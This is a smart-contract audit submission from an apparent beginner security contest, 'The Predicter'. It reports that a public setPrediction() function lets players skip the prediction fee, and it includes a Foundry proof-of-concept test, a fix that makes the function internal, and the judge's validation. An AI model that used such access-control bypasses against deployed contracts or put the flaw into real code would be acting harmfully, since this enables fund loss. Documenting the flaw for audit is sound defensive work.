First Flight #20: The Predicter
First Flight #20
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

The Public Visiblity of the setPrediction() will allow any player to set prediction without paying predition fee

0xsagetony

Summary

The setPrediction function is public, meaning it can be called by any player registered in the contract. This exposes a vulnerability, as attackers can bypass paying the prediction fee by exploiting this accessibility.

Vulnerability Details

The setPrediction function is public, meaning it can be called by any player registered in the contract. This exposes a vulnerability, as attackers can bypass paying the prediction fee by exploiting this accessibility.

POC

function test_playersCanPreditWithoutPaying() public {
vm.startPrank(stranger);
vm.deal(stranger, 1 ether);
thePredicter.register{value: 0.04 ether}();
vm.stopPrank();
vm.startPrank(organizer);
thePredicter.approvePlayer(stranger);
vm.stopPrank();
vm.startPrank(stranger);
scoreBoard.setPrediction(stranger, 1, ScoreBoard.Result.Draw);
vm.stopPrank();
assertEq(stranger.balance, 0.96 ether);
}

Impact

This oversight can lead to a loss of funds and damage the overall integrity of the protocol. Allowing pending players to make predictions without paying the prediction fee undermines the system's fairness and reliability.

Tools Used

Manual

Recommendations

function setPrediction(
address player,
uint256 matchNumber,
Result result
) internal {}
Updates

Lead Judging Commences

NightHawK Lead Judge 11 months ago
Submission Judgement Published
Validated
Assigned finding tags:

setPrediction lacks access control

setPrediction has no access control and allows manipulation to Players' predictions.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.